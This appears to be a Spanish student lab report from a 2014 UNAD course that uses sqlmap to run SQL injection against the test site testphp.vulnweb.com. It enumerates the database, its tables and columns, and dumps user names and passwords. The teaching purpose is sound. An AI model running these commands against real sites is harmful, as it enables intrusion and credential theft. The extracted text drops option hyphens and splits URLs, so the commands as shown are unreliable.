web Presentado por: Carlos Orlando Daz Tutor: Jess Emiro Vega
Escuela de Ciencias Bsicas , tecnologa e ingeniera UNAD - 2014
Inicialmente ingresamos Al sitio web a atacar, en este Caso http://testphp.vulnweb.com Igual que en el ejercicio De Badstore inicialmente Buscamos la versin de la Base de datos son la siguiente Lnea:
C:\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/searc h.php?test=query" b Para conocer el nombre De la base de datos Utilizamos la siguiente Lnea de comandos:
En este caso la base de datos se denomina acuart Para conocer las tablas de la base De datos digitamos la siguiente lnea De comandos:
C:\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/search .php?test=query" D acuart -- tables Para conocer las columnas De la tabla users Utilizamos la siguiente lnea De comandos:
C:\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/ search.php?test=query" D acuart T users -- columns
Asi podremos conocer el nombre de usuario y la Contrasea de los usuarios Registrados en el sitio Para conocer el nombre de usuario se utiliza la siguiente linea de comandos
C:\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/search. php?test=query" D acuart T users C name --dump
En este caso nos arroja la informacin del nombre de usuario Para conocer el nombre de usuario se utiliza la siguiente linea de comandos
C:\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/se arch.php?test=query" D acuart T users C pass -- dump
En este caso nos arroja la informacin de la contrasea Del usuario. Referencias Bibliogrficas http://blog.elhacker.net/2014/06/sqlmap-automatizando-ataques-sqli-injection.html http://www.youtube.com/watch?v=5DCqk0l0IoY http://www.youtube.com/watch?v=yU9bUb026_4 http://www.hacktimes.com/sql_injection_con_sqlmap/